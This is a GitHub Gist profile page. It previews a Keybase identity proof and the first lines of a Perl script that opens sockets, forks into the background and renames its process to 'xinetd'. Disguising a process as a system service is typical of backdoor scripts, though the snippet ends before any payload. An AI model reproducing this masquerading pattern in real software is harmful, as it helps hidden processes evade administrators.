Skip to content

Instantly share code, notes, and snippets.

View isjerryxiao's full-sized avatar
⛑️
moving bricks

Jerry Xiao isjerryxiao

⛑️
moving bricks
View GitHub Profile
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$0 = "xinetd"; my ($q1, $q2) = ("0.7", "0.8"); $| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;

Keybase proof

I hereby claim:

  • I am isjerryxiao on github.
  • I am jerryxiao (https://keybase.io/jerryxiao) on keybase.
  • I have a public key whose fingerprint is 1862 4220 4A2E C704 38E9 CE3B 9D9C E436 50FF 2BAA

To claim this, I am signing this object: